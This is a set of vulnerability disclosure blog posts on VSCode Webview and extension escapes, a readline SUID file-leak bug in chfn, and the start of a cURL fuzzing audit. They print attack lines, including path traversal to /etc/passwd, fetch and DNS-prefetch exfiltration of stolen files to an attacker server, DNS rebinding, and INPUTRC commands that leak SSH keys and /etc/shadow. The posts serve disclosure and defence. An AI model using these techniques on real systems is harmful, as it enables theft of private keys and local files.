Notice that the URL path is decoded with decodeURIComponent. This is why our %2f is decoded! But this alone still doesn’t explain why the path traversal works. Normalizing the path before checking if the path belongs to one of the roots would prevent our exploit. Let’s keep going.

The loadResource function simply calls loadLocalResource with roots: localResourceRoots.

The loadResource function calling loadLocalResource with the localResourceRoots option (source)

Then, the loadLocalResource function calls getResourceToLoad, which will iterate over each root in localResourceRoots and check if the requested path is in one of these roots. If all checks pass, loadLocalResource reads and returns the file contents, as shown below.

Code that checks if a path is within the expected root folders and returns the file contents on success. Highlighted in red is the .startsWith check without any prior normalization—the second reason our exploit works. (source)

There is no path normalization, and the root check is done with resourceFsPath.startsWith(rootPath). This is why our path traversal works! If our path is [valid-root-path]/../../../../../etc/issue, we’ll pass the .startsWith check even though our path points to somewhere outside of the root.

In summary, two mistakes allow our exploit:

  • The VSCode extension calls decodeURIComponent(path) on the path, decoding %2f to /. This allows us to bypass the browser’s normalization and introduce ../ sequences in the path.
  • The containsResource function checks that the requested file is within the expected localResourceRoots folder with the startsWith function without first normalizing the path (i.e., removing the ../ sequences). This allows us to traverse outside the root with a payload such as [valid-root-path]/../../../.

This bug is hard to spot by just manually auditing the code. The layers of abstraction and all the message passing mask where our data flows through, as well as some of the critical details that make the exploit work. This is why evaluating and testing software by executing the code and observing its behavior at runtime—dynamic analysis—is such an important part of auditing complex systems. Finding this bug through static analysis would require defining sources, sinks, sanitizers, and an interprocedural engine capable of understanding data that is passed in postMessage calls. After all that work, you may still end up with a lot of false positives and false negatives; we use static analysis tools extensively at Trail of Bits, but they’re not the right tool for this job.

Recommendations for preventing path traversals

In the last blog’s third vulnerability, we examined a path traversal vulnerability caused by parsing a URL’s query string with flawed hand-coded logic that allowed us to circumvent the path normalization done by the browser. These bugs are very similar; in both cases, URL parsing differences and the reliance on the browser to do path normalization resulted in path traversal vulnerabilities with critical consequences.

So, when handling URLs, we recommend following these principles:

  • Parse the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
  • Do not transform any URL components after normalization unless there is a very good reason to do so. As we’ve seen, even decoding the path with a call to decodeURIComponent(path) was enough to fully bypass the localResourceRoots feature since other parts of the code had assumptions that the browser would have normalized the path. If you want to read more about URL parsing discrepancies and how they can lead to critical bugs, I recommend reading A New Era of SSRF by Orange Tsai and Exploiting URL Parsing Confusion.
  • Always normalize the file path before checking if the file is within the expected root. Doing both operations together, ideally in the same encapsulated function, ensures that no future or existing code will transform the path in any way that invalidates the normalization operation.

Timeline

  • September 7, 2022: Reported the bug to Microsoft
  • September 16, 2022: Microsoft confirmed the behavior of the report and mentioned that the case is being reviewed for a possible bounty award
  • September 20, 2022: Microsoft marks the report as out-of-scope for a bounty because “VS code extensions are not eligible for bounty award”
  • September 21, 2022: I reply mentioning that the bug is in the way VSCode interacts with extensions, but not in a VSCode extension
  • September 24, 2022: Microsoft acknowledges their mistake and awards the bug a $7,500 bounty.
  • October 11, 2022: Microsoft fixes the bug in PR #163327 and assigns it CVE-2022-41042.

Escaping misconfigured VSCode extensions

By Vasco Franco

TL;DR: This two-part blog series will cover how I found and disclosed three vulnerabilities in VSCode extensions and one vulnerability in VSCode itself (a security mitigation bypass assigned CVE-2022-41042 and awarded a $7,500 bounty). We will identify the underlying cause of each vulnerability and create fully working exploits to demonstrate how an attacker could have compromised your machine. We will also recommend ways to prevent similar issues from occurring in the future.

A few months ago, I decided to assess the security of some VSCode extensions that we frequently use during audits. In particular, I looked at two Microsoft extensions: SARIF viewer, which helps visualize static analysis results, and Live Preview, which renders HTML files directly in VSCode.

Why should you care about the security of VSCode extensions? As we will demonstrate, vulnerabilities in VSCode extensions—especially those that parse potentially untrusted input—can lead to the compromise of your local machine. In both the extensions I reviewed, I found a high-severity bug that would allow an attacker to steal all of your local files. With one of these bugs, an attacker could even steal your SSH keys if you visited a malicious website while the extension is running in the background.

During this research, I learned about VSCode Webviews—sandboxed UI panels that run in a separate context from the main extension, analogous to an iframe in a normal website—and researched avenues to escape them. In this post, we’ll dive into what VSCode Webviews are and analyze three vulnerabilities in VSCode extensions, two of which led to arbitrary local file exfiltration. We will also look at some interesting exploitation tricks: leaking files using DNS to bypass restrictive Content-Security-Policy (CSP) policies, using srcdoc iframes to execute JavaScript, and using DNS rebinding to elevate the impact of our exploits.

In an upcoming blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.

VSCode Webviews

Before diving into the bugs, it’s important to understand how a VSCode extension is structured. VSCode is an Electron application with privileges to access the filesystem and execute arbitrary shell commands; extensions have all the same privileges. This means that if an attacker can execute JavaScript (e.g., through an XSS vulnerability) in a VSCode extension, they can achieve a full compromise of the system.

As a defense-in-depth protection against XSS vulnerabilities, extensions have to create UI panels inside sandboxed Webviews. These Webviews don’t have access to the NodeJS APIs, which allow the main extension to read files and run shell commands. Webviews can be further limited with several options:

  • enableScripts: prevents the Webview from executing JavaScript if set to false. Most extensions require enableScripts: true.
  • localResourceRoots: prevents Webviews from accessing files outside of the directories specified in localResourceRoots. The default is the current workspace directory and the extension’s folder.
  • Content-Security-Policy: mitigates the impact of XSS vulnerabilities by limiting the sources from which the Webview can load content (images, CSS, scripts, etc.). The policy is added through a meta tag of the Webview’s HTML source, such as:
     <meta http-equiv="Content-Security-Policy" content="default-src 'none';">

Sometimes, these Webview panels need to communicate with the main extension to pass some data or ask for a privileged operation that they cannot perform on their own. This communication is achieved by using the postMessage() API.

Below is a simple, commented example of how to create a Webview and how to pass messages between the main extension and the Webview.

Example of a simple extension that creates a Webview

An XSS vulnerability inside the Webview should not lead to a compromise if the following conditions are true: localResourceRoots is correctly set up, the CSP correctly limits the sources from which content can be loaded, and no postMessage handler is vulnerable to problems such as command injection. Still, you should not allow arbitrary execution of untrusted JavaScript inside a Webview; these security features are in place as a defense-in-depth protection. This is analogous to how a browser does not allow a renderer process to execute arbitrary code, even though it is sandboxed.

You can read more about Webviews and their security model in VSCode’s documentation for Webviews.

Now that we understand Webviews a little better, let’s take a look at three vulnerabilities that I found during my research and how I was able to escape Webviews and exfiltrate local files in two VSCode extensions built by Microsoft.

Vulnerability 1: HTML/JavaScript injection in Microsoft’s SARIF viewer

Microsoft’s SARIF viewer is a VSCode extension that parses SARIF files—a JSON-based file format into which most static analysis tools output their results—and displays them in a browsable list.

Since I use the SARIF viewer extension in all of our audits to triage static analysis results, I wanted to know how well it was protected against loading untrusted SARIF files. These untrusted files can be downloaded from an untrusted source or, more likely, result from running a static analysis tool—such as CodeQL or Semgrep—with a malicious rule containing metadata that can manipulate the resulting SARIF file (e.g., the finding’s description).

While examining the code where the SARIF data is rendered, I came across a suspicious-looking snippet in which the description of a static analysis result is rendered using the ReactMarkdown class with the escapeHtml option set to false.

Code that unsafely renders the description of a finding parsed from a SARIF file (source)

Since HTML is not escaped, by controlling the markdown field of a result’s message, we can inject arbitrary HTML and JavaScript in the Webview. I quickly threw up a proof of concept (PoC) that automatically executed JavaScript using the onerror handler of an img with an invalid source.

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension

It worked! The picture below shows the exploit in action.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

This was the easy part. Now, we need to weaponize this bug by fetching sensitive local files and exfiltrating them to our server.

Fetching local files

Our HTML injection is inside a Webview, which, as we saw, is limited to reading files inside its localResourceRoots. The Webview is created with the following code:

Code that creates the Webview in the SARIF viewer extension with an unsafe localResourceRoots option (source)

As we can see, localResourceRoots is configured very poorly. It allows the Webview to read files from anywhere on the disk, up to the z: drive! This means that we can just read any file we want—for example, a user’s private key at ~/.ssh/id_rsa.

Inside the Webview, we cannot open and read a file since we don’t have access to NodeJS APIs. Instead, we make a fetch to https://file+.vscode-resource.vscode-cdn.net/, and the file contents are sent in the response (if the file exists and is within the localResourceRoots path).

To leak /etc/issue, all we need is to make the following fetch:

Example of code that reads the /etc/issue file inside a Webview

Example of code that reads the /etc/issue file inside a Webview

Exfiltrating files

Now, we just need to send the file contents to our remote server. Normally, this would be easy; we would make a fetch to a server we control with the file’s contents in the POST body or in a GET parameter (e.g., fetch('https://our.server.com?q=')).

However, the Webview has a fairly restrictive CSP. In particular, the connect-src directive restricts fetches to self and https://*.vscode-cdn.net. Since we don’t control either source, we cannot make fetches to our attacker-controlled server.

CSP of the SARIF viewer extension’s Webview (source)

We can circumvent this limitation with, you guessed it, DNS! By injecting tags with the rel="dns-prefetch" attribute, we can leak file contents in subdomains even with the restrictive CSP connect-src directive.

Example of HTML code that leaks files using DNS to circumvent a restrictive CSP

To leak the file, all we need is to encode the file in hex and inject tags in the DOM, where the href points to our attacker-controlled server with the encoded file contents in the subdomains. We just need to ensure that each subdomain has at most 64 characters (including the .s) and that the whole subdomain has less than 256 characters.

Putting it all together

By combining these techniques, we can build an exploit that exfiltrates the user’s $HOME/.ssh/id_rsa file. Here is the commented exploit:

Exploit that steals a user’s private key when they open a compromised SARIF file in the SARIF viewer extension

This was all possible because the extension used the ReactMarkdown component with the escapeHtml = {false} option, allowing an attacker with partial control of a SARIF file to inject JavaScript in the Webview. Thanks to a very permissive localResourceRoots, the attacker could take any file from the user’s filesystem. Would this vulnerability still be exploitable with a stricter localResourceRoots? Wait for the second blog post! ;)

To detect these issues automatically, we improved Semgrep’s existing ReactMarkdown rule in PR #2307. Try it out against React codebases with semgrep --config "p/react."

Vulnerability 2: HTML/JavaScript injection in Microsoft’s Live Preview extension

Microsoft’s Live Preview, a VSCode extension with more than 1 million installs, allows you to preview HTML files from your current workspace in an embedded browser directly in VSCode. I wanted to understand if I could safely preview malicious HTML files using the extension.

The extension starts by creating a local HTTP server on port 3000, where it hosts the current workspace directory and all of its files. Then, to render a file, it creates an iframe that points to the local HTTP server (e.g., iframe src=”http://localhost:3000/file.html” ) inside a Webview panel. (Sandboxing inception!) This architecture allows the file to execute JavaScript without affecting the main Webview.

The inner preview iframe and the outer Webview communicate using the postMessage API. If we want to inject HTML/JavaScript in the Webview, its postMessage handlers are a good place to start!

Finding an HTML/JavaScript injection

We don’t have to look hard! The link-hover-start handler is vulnerable to HTML injection because it directly passes input from the iframe message (which we control the contents of) to the innerHTML attribute of an element of the Webview without any sanitization. This allows an attacker to control part of the Webview’s HTML.

Code where the innerHTML of a Webview element is set to the contents of the message originated in the HTML file being previewed. (source)

Achieving JavaScript execution with srcdoc iframes

The naive approach of setting innerHTML to

 <script> console.log('HELLO'); </script> 

does not work because the script is added to the DOM but does not get loaded. Thankfully, there’s a neat trick we can use to circumvent this limitation: writing the script inside an srcdoc iframe, as shown in the figure below.

PoC that uses an srcdoc iframe to trigger JavaScript execution when set to the innerHTML of a DOM element

The browser considers srcdoc iframes to have the same origin as their parent windows. So even though we just escaped one iframe and injected another, this srcdoc iframe will have access to the Webview’s DOM, global variables, and functions.

The downside is that the iframe is now ruled by the same CSP as the Webview.

default-src 'none';
connect-src ws://127.0.0.1:3001/ 'self';
font-src 'self' https://*.vscode-cdn.net;
style-src 'self' https://*.vscode-cdn.net;
script-src 'nonce-';
frame-src http://127.0.0.1:3000;
CSP of the Live Preview extension’s Webview (source)

In contrast with the first vulnerability , this CSP’s script-src directive does not include unsafe-inline, but instead uses a nonce-based script-src. This means that we need to know the nonce to be able to inject our arbitrary JavaScript. We have a few options to accomplish this: brute-force the nonce, recover the nonce due to poor randomness, or leak the nonce.

The nonce is generated with the following code:

Code that generates the nonce used in the CSP of the Live Preview extension’s Webview (source)

Brute-forcing the nonce

While we can try as many nonces as we please without repercussion, the nonce has a length of 64 with an alphabet of 62 characters, so the universe would end before we found the right one.

Recovering the nonce due to poor randomness

An astute reader might have noticed that the nonce-generating function uses Math.random, a cryptographically unsafe random number generator. Math.random uses the xorshift128+ algorithm behind the scenes, and, given X random numbers, we can recover the algorithm’s internal state and predict past and future random numbers. See, for example, the Practical Exploitation of Math.random on V8 conference talk, and an implementation of the state recovery.

My idea was to call Math.Random repeatedly in our inner iframe and recover the state used to generate the nonce. However, the inner iframe, the outer Webview, and the main extension that created the random nonce have different instances of the internal algorithm state; we cannot recover the nonce this way.

Leaking the nonce

The final option was to leak the nonce. I searched the Webview code for postMessage handlers that sent data into the inner iframe (the one we control) in the hopes that we could somehow sneak in the nonce.

Our best bet is the findNext function, which sends the value of the find-input element to our iframe.

Code that shows the Webview sending the contents of the find-input value to the previewed page (source)

My goal was to somehow make the Webview attach the nonce to a “fake” find-input element that we would inject using our HTML injection. I dreamed of injecting an incomplete element like input id="find-input" value=" : This would create a “fake” element with the find-input ID, and open its value attribute without closing it. However, this was doomed to fail for multiple reasons. First, we cannot escape from the element we are setting the innerHTML to, and since we are writing it in full, it could never contain the nonce. Second, the DOM parser does not parse the HTML in the example above; our element is just left empty. Finally, the document.getElementById('find-input') always finds the already existing element, not the one we injected.

At this point, I was at a dead end; the CSP effectively prevented the full exploit. But I wanted more! In the next vulnerability, we’ll look at another bug that I used to fully exploit the Live Preview extension without injecting any JavaScript in the Webview.

Vulnerability 3: Path traversal in the local HTTP server in Microsoft’s Live Preview extension

Since we couldn’t get around the CSP, I thought another interesting place to investigate was the local HTTP server that serves the HTML files to be previewed. Could we fetch arbitrary files from it or could we only fetch files in the current workspace?

The HTTP server will serve any file in the current workspace, allowing an HTML file to load JavaScript files or images in the same workspace. As a result, if you have sensitive files in your current workspace and preview a malicious HTML file in the same workspace, the malicious file can easily fetch and exfiltrate the sensitive files. But this is by design, and it is unlikely that a user’s workspace will have both malicious and sensitive files. Can we go further and leak files from elsewhere on the filesystem?

Below is a simplified version of the code that handles each HTTP request.

Code that servers the Live Preview extension’s local HTTP server (source)

My goal was to find a path traversal vulnerability that would allow me to escape the basePath root.

Finding a path traversal bug

The simple approach of calling fetch("../../../../../../etc/passwd") does not work because the browser normalizes the request to fetch("/etc/passwd"). However, the server logic does not prevent this path traversal attack; the following cURL command retrieves the /etc/passwd file!

curl --path-as-is http://127.0.0.1:3000/../../../../../../etc/passwd
cURL command that demonstrates that the server does not prevent path traversal attacks

This can’t be achieved through a browser, so this exploitation path is infeasible. However, I noticed slight differences in how the browser and the HTTP server parse the URL that may allow us to pull off our path traversal attack. The server uses hand-coded logic to parse the URL’s query string instead of using the JavaScript URL class, as shown in the snippet below.

Code with hand-coded logic to parse a URL’s query string (source)

This code splits the query string from the URL using lastIndexOf('?'). However, a browser will parse a query string from the first index of ?. By fetching ?../../../../../../etc/passwd?AAA the browser will not normalize the ../ sequences because they are part of the query string from the browser’s point of view (in green in the figure below). From the server’s point of view (in blue in the figure below), only AAA is part of the query string, so the URLPathName variable will be set to ?../../../../../../etc/passwd, and the full path will be normalized to /etc/passwd with path.join(basePath ?? '', URLPathName). We have a path traversal!

URL parsing differences between the browser and the server

Exploitation scenario 1

If an attacker controls a file that a user opens with the VSCode Live Preview extension, they can use this path traversal to leak arbitrary user files and folders.

In contrast with vulnerability 1, this exploit is quite straightforward. It follows these simple steps:

  1. From the HTML file being previewed, fetch the file or directory that we want to leak with fetch("http://127.0.0.1:3000/?../../../../../../../../../etc/passwd?"). (Note that we can see the fetch results even without a CORS policy because our exploit file is also hosted on the http://127.0.0.1:3000 origin.)
  2. Encode the file contents in base64 with leaked_file_b64 = btoa(leaked_file).
  3. Send the encoded file to our attacker-controlled server with fetch("http://?q=" + leaked_file_b64).

Here is the commented exploit:

Exploit that exfiltrates local files when a user previews a malicious HTML file with the Live Preview extension

Exploitation scenario 2

The previous attack scenario only works if a user previews an attacker-controlled file, but using that exploit is going to be very hard. But we can go further! We can increase the vulnerability’s impact by only requiring that the victim visits an attacker’s website while the Live Preview HTTP server is running in the background with DNS rebinding—a common technique to exploit unauthenticated internal services.

In a DNS rebinding attack, an attacker changes a domain’s DNS record between two IPs—the attacker server’s IP and the local server’s IP (commonly 127.0.0.1). Then, by using JavaScript to fetch this changing domain, an attacker will trick the browser into accessing local servers without any CORS warnings since the origin remains the same. For a more complete explanation of DNS Rebinding attacks, see this blog post.

To set up our exploit, we’ll do the following:

  1. Host our attacker-controlled server with the exploit at 192.168.13.128:3000.
  2. Use the rbndr service with the 7f000001.c0a80d80.rbndr.us domain that flips its DNS record between 192.168.13.128 and 127.0.0.1.

(NOTE: If you want to reproduce this setup, ensure that running host 7f000001.c0a80d80.rbndr.us will alternate between the two IPs. This works flawlessly on my Linux machine, with 8.8.8.8 as the DNS server.)

To steal a victim’s local files, we need to make them browse to the 7f000001.c0a80d80.rbndr.us URL, hoping that it will resolve to our server with the exploit. Then, our exploit page makes fetches with the path traversal attack on a loop until the browser makes a DNS request that resolves to the 127.0.0.1 IP; once it does so, we get the content of the sensitive file. Here is the commented exploit:

Exploit that exfiltrates local files when a user visits a malicious web page while the Live Preview extension is running in the background

How to secure VSCode Webviews

Webviews have strong defaults and mitigations to minimize a vulnerability’s impact. This is great, and it totally prevented a full compromise in our vulnerability 2! However, these vulnerabilities also showed that extensions—even those built by Microsoft, the creators of VSCode—can be misconfigured. For example, vulnerability 1 is a glaring example of how not to set up the localResourceRoots option.

If you are building a VSCode extension and plan on using Webviews, we recommend following these principles:

  1. Restrict the CSP as much as possible. Start with default-src 'none' and add other sources only as needed. For the script-src directive, avoid using unsafe-inline; instead, use a nonce or hash-based source. If you use a nonce-based source, generate it with a cryptographically-strong random number generator (e.g., crypto.randomBytes(16).toString('base64'))
  2. Restrict the localResourceRoots option as much as possible. Preferably, allow the Webview to read only files from the extension’s installation folder.
  3. Ensure that any postMessage handlers in the main extension thread are not vulnerable to issues such as SQL injection, command injection, arbitrary file writes, or arbitrary file reads.
  4. If your extension runs a local HTTP server, minimize the risk of path traversal attacks by:
    • Parsing the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
    • Checking if the file is within the expected root after normalizing the path and right before reading the file.
  5. If your extension runs a local HTTP server, minimize the risk of DNS rebinding attacks by:
    • Spawning the server on a random port and using the Webview’s portMapping option to map the random localhost port to a static one in the Webview. This will limit an attacker’s ability to fingerprint if the server is running and make it harder for them to brute-force the port. It has the added benefit of seamlessly handling cases where the hard-coded port is in use by another application.
    • Allowlisting the Host header with only localhost and 127.0.0.1 (like CUPS does). Alternatively, authenticate the local server.
  6. And, of course, don’t flow user input into .innerHTML—but you already knew that one. If you’re trying to add text to an element, use .innerText instead.

If you follow these principles you’ll have a well-configured VSCode extension. Nothing can go wrong, right? In a second blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.

Timeline

  • August 12, 2022: Reported vulnerability 1 to Microsoft
  • August 13–16, 2022: Vulnerability 1 was fixed in c054421 and 98816d9
  • September 7, 2022: Reported vulnerability 2 and 3 to Microsoft
  • September 14, 2022: Vulnerability 2 fixed in 4e029aa
  • October 5, 2022: Vulnerability 3 fixed in 9d26055 and 88503c4

Readline crime: exploiting a SUID logic bug

By roddux // Rory M

I discovered a logic bug in the readline dependency that partially reveals file information when parsing the file specified in the INPUTRC environment variable. This could allow attackers to move laterally on a box where sshd is running, a given user is able to login, and the user’s private key is stored in a known location (/home/user/.ssh/id_rsa).

This bug was reported and patched back in February 2022, and chfn isn’t typically provided by util-linux anyway, so your boxen are probably fine. I’m writing about this because the exploit is amusing, as it’s made possible due to a happy coincidence of the readline configuration file parsing functions marrying up well to the format of SSH keys—explained further in this post.

TL;DR:

$ INPUTRC=/root/.ssh/id_rsa chfn
Changing finger information for user.
Password: 
readline: /root/.ssh/id_rsa: line 1: -----BEGIN: unknown key modifier
readline: /root/.ssh/id_rsa: line 2: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn: no key sequence terminator


    ...


readline: /root/.ssh/id_rsa: line 37: avxwhoky6ozXEAAAAJcm9vdEBNQVRFAQI=: no key sequence terminator
readline: /root/.ssh/id_rsa: line 38: -----END: unknown key modifier
Office [b]: ^C
$

Finding the bug

I was recently enticed by SUID bugs after fawning over the Qualys sudo bug a while back. As I was musing through The Art of Software Security Assessment —vol. 2 wen?— I was spurred into looking at environment variables as an attack surface. With a couple of hours to kill, I threw an interposing library into /etc/ld.so.preload to log getenv calls:

#define _GNU_SOURCE
#include 
#include 

// gcc getenv.c -fPIC -shared -ldl -o getenv.so

char *(*_real_getenv)(const char *) = 0;
char *getenv(const char *name) {
      if(!_real_getenv) _real_getenv = dlsym(RTLD_NEXT, "getenv");
      char *res = _real_getenv(name);
      syslog(1, "getenv(\"%s\") => \"%s\"\n", name, res);
      return res;
}

NB: We’re just going to pretend this is how I did it from the get-go, and that I didn’t waste time screwing around trying to get SUID processes launched under gdb.

With the logging library in place, I ran find / -perm /4000 (yes, I Googled the arguments) to find all of the SUID binaries on my system.

If you’re playing along, be warned: logging all getenv calls is insanely noisy and leads to many tedious, repetitive, uninteresting, and repetitive results. After blowing through countless (like, 20) variations of LC_MESSAGES, SYSTEMD_IGNORE_USERDB, SYSTEMD_IGNORE_CHROOT and friends, I came across INPUTRC, which is used somewhere in the chfn command. Intuiting that INPUTRC refers to a configuration file, I blindly passed INPUTRC=/etc/shadow to see what would happen…

$ INPUTRC=/etc/shadow chfn
Changing finger information for user.
Password: 
readline: /etc/shadow: line 9: systemd-journal-remote: unknown key modifier
readline: /etc/shadow: line 10: systemd-network: unknown key modifier
readline: /etc/shadow: line 11: systemd-oom: unknown key modifier
readline: /etc/shadow: line 12: systemd-resolve: unknown key modifier
readline: /etc/shadow: line 13: systemd-timesync: unknown key modifier
readline: /etc/shadow: line 14: systemd-coredump: unknown key modifier
Office [b]: ^C
$

Hmmmmm. /etc/shadow? In my terminal? It’s more likely than you think.

Between the lines: root cause analysis

My first thought was to Google “INPUTRC.” Helpfully, the first result of my search gave me clues that it was related to the readline library. Indeed, by digging through the readline-8.1 source code, I found that “INPUTRC” is passed (via sh_get_env_value) as a parameter to getenv. Looks about right!

int rl_read_init_file (const char *filename) {
  // ...
  if (filename == 0)
    filename = sh_get_env_value ("INPUTRC");     // <- bingo

Searching the readline codebase for the error message “unknown key modifier” that we saw earlier also turns up results. rl_read_init_file calls _rl_read_init_file, which routes to the rl_parse_and_bind function, which emits the error. From this call stack, we can deduce the error occurs when readline attempts to parse the input file—specifically, when it tries to interpret the file contents as a keybind configuration.

Let’s take it from the top. After skipping whitespace, _rl_read_init_file calls rl_parse_and_bind for each non-comment line in the input file. The rl_parse_and_bind function contains four error paths that lead to _rl_init_file_error, which prints the line currently being parsed. This is the root of the bug, as readline is not aware that it’s running with elevated privileges, and assumes it’s safe to print parts of the input file.

_rl_init_file_error is called with the argument string (which is the current line as it loops over the config file) on lines 1557, 1569, 1684, and 1759. Several other error paths can result in partial disclosure of the current line; they are omitted here for brevity. We will also skip looking at what would happen with passing binary files.

By examining the conditions required to reach the paths mentioned above, we can deduce the conditions under which we can leak lines from a file:

  1. We can leak a line that begins with a quotation mark and does not have a closing quotation mark:
    if (*string == '"') {
        i = _rl_skip_to_delim (string, 1, '"');
    
        /* If we didn't find a closing quote, abort the line. */
        if (string[i] == '\0') {
            _rl_init_file_error ("%s: no closing `\"' in key binding", string);
            return 1;
          }
        else
          i++;    /* skip past closing double quote */
      }
    
    $ cat test 
    "AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: "AAAAA: no closing `"' in key binding
    Office [test]: ^C
    $
    
  2. We can leak a line that starts with a colon and contains no whitespace or nulls:
    i = 0;
    // ...
    /* Advance to the colon (:) or whitespace which separates the two objects. */
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    
    if (i == 0) {
        _rl_init_file_error ("`%s': invalid key binding: missing key sequence", string);
        return 1;
      }
    
    $ cat test
    :AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: `:AAAAA: invalid key binding: missing key sequence
    Office [test]: ^C
    $
    
  3. We can leak a line that does not contain a space, a tab, or a colon (or nulls):
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    // ...
    foundsep = c != 0;
    // ...
    if (foundsep == 0) {
       _rl_init_file_error ("%s: no key sequence terminator", string);
       return 1;
     }
    
    $ cat test
    AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: AAAAA: no key sequence terminator
    Office [test]: ^C
    $ 
    

Happily, SSH keys match this third path, so we can stop here. Well, the juicy bits match, anyway—all the key data is typically Base64-encoded in a PEM container. We can also use this bug to read anything else that’s inside a PEM container, such as certificate files; or just base64 encoded, such as wireguard keys.

Impact

The bug was introduced in version 2.30-rc1 in 2017, which would make the bug old enough to hit LTS releases. However; Debian, Red Hat and Ubuntu have chfn provided by a different package, so are unaffected. In the default configuration on Red Hat, /etc/login.defs doesn’t contain CHFN_RESTRICT. This omission would prevent util-linux/chfn from changing any user information, which would also kill the bug. Neither CentOS or Fedora seem to have chfn installed by default in my testing, either.

Outside of chfn, then, how impactful is this? readline is quite well known, but our interest here is its use in SUID binaries. Running ldd on every SUID on my Arch box shows that the library is used only by chfn... How can we quickly determine a wider impact?

I first thought of scanning the package repositories, but unfortunately none of the web interfaces to the Debian, Ubuntu, Fedora, CentOS or Arch package repos provide file modes... This means we don’t have enough information to determine whether any binaries in a given package are SUID.

Sooo I mirrored the Debian and Arch repos for x86_64 and checked them by hand, assisted by some terrible shell scripts. The gist of that endeavor is that Arch is the only distro that has a package (util-linux) that contains a SUID executable (chfn) which loads readline by default. Oh well!

Side note: I totally fumbled reporting the CVE for this, so my name isn’t listed against the CVE with MITRE... RIP my career.

Don’t use readline in SUID applications

This was pretty much the result of an email chain sent to the Arch and Red Hat security teams, and to the package maintainer, who went ahead and removed readline support from chfn. The bug got patched like a year ago, so hopefully most affected users have updated by now.

Homework: go have a look at how many SUIDs use ncurses— atop on macOS, at least—and try messing with the TERMINFO environment variable... Let me know if you find anything :^)

Acknowledgements

Thank you to Karel Zak, and both of the Arch and Red Hat Security teams, who were all very helpful and expedient in rolling out fixes. Thank you also to disconnect3d for help and advice.

Timeline

  • May 2, 2017: Bug introduced
  • December 31, 2020: g l o b a l     t i m e l i n e     r e s e t
  • February 8, 2022: Reported the bug to Arch and util-linux upstream
  • February 14, 2022: Bug fixed in util-linux upstream
  • March 28, 2022: Blog post about the discovery of the bug drafted
  • May 12, 2022: Blog post published internally
  • May 2022-Feb 2023: Procrastination^H Allowing time for updates to roll out
  • February 16, 2023: Blog post published

References

cURL audit: How a joke led to significant findings

By Maciej Domanski

In fall 2022, Trail of Bits audited cURL, a widely-used command-line utility that transfers data between a server and supports various protocols. The project coincided with a Trail of Bits maker week, which meant that we had more manpower than we usually do, allowing us to take a nonstandard approach to the audit.

While discussing the threat model of the application, one of our team members jokingly asked, “Have we tried curl AAAAAAAAAA… yet”? Although the comment was made in jest, it sparked an idea: we should fuzz cURL’s command-line interface (CLI). Once we did so, the fuzzer quickly uncovered memory corruption bugs, specifically use-after-free issues, double-free issues, and memory leaks. Because the bugs are in libcurl, a cURL development library, they have the potential to affect the many software applications that use libcurl. This blog post describes how we found the following vulnerabilities:

Working with cURL

cURL is continuously fuzzed by the OSS-Fuzz project, and its harnesses are developed in the separate curl-fuzzer GitHub repository. When I consulted the curl-fuzzer repository to check out the current state of cURL fuzzing, I noticed that cURL’s command-line interface (CLI) arguments are not fuzzed. With that in mind, I decided to focus on testing cURL’s handling of arguments. I used the AFL++ fuzzer (a fork of AFL) to generate a large amount of random input data for cURL’s CLI. I compiled cURL using collision-free instrumentation at link time with AddressSanitizer and then analyzed crashes that could indicate a bug.

cURL obtains its options through command-line arguments. As cURL follows the C89 standard, the main() function of a program can be defined with no parameters or with two parameters (argc and argv). The argc argument represents the number of command-line arguments passed to the program (which includes the program’s name). The argv argument is an array of pointers to the arguments passed to the program from the command line.

The standard also states that in a hosted environment, the main() function takes a third argument, char *envp[]; this argument points to a null-terminated array of pointers to char, each of which points to a string with information about the program’s environment.

The three parameters can have any name, as they are local to the function in which they are declared.

cURL’s main() function in the curl/src/tool_main.c file passes the command-line arguments to the operate() function, which parses them and sets up the global configuration of cURL. cURL then uses that global configuration to execute the operations.

Figure 1.1: cURL’s main() function (curl/src/tool_main.c#236–288)

Fuzzing argv

When I started the process of attempting to fuzz cURL, I looked for a way to use AFL to fuzz its argument parsing. My search led me to a quote from the creator of AFL (Michal Zalewski):

“AFL doesn’t support argv fuzzing because TBH, it’s just not horribly useful in practice. There is an example in experimental/argv_fuzzing/ showing how to do it in a general case if you really want to.”

I looked at that experimental AFL feature and its equivalent in AFL++. The argv fuzzing feature makes it possible to fuzz arguments passed to a program from the CLI, instead of through standard input. That can be useful when you want to cover multiple APIs of a library in fuzz testing, as you can fuzz the arguments of a tool that uses the library rather than writing multiple fuzz tests for each API.

How does the AFL++ argvfuzz feature work?

The argv-fuzz-inl.h header file of argvfuzz defines two macros that take input from the fuzzer and set up argv and argc:

  • The AFL_INIT_ARGV() macro initializes the argv array with the arguments passed to the program from the command line. It then reads the arguments from standard input and puts them in the argv array. The array is terminated by two NULL characters, and any empty parameter is encoded as a lone 0x02 character.
  • The AFL_INIT_SET0(_p) macro is similar to AFL_INIT_ARGV() but also sets the first element of the argv array to the value passed to it. This macro can be useful if you want to preserve the program’s name in the argv array.

Both macros rely on the afl_init_argv() function, which is responsible for reading a command line from standard input (by using the read() function in the unistd.h header file) and splitting it into arguments. The function then stores the resulting array of strings in a static buffer and returns a pointer to that buffer. It also sets the value pointed to by the argc argument to the number of arguments that were read.

To use the argv-fuzz feature, you need to include the argv-fuzz-inl.h header file in the file that contains the main() function and add a call to either AFL_INIT_ARGV or AFL_INIT_SET0 at the beginning of main(), as shown below:

curl/src/tool_main.c

Preparing a dictionary

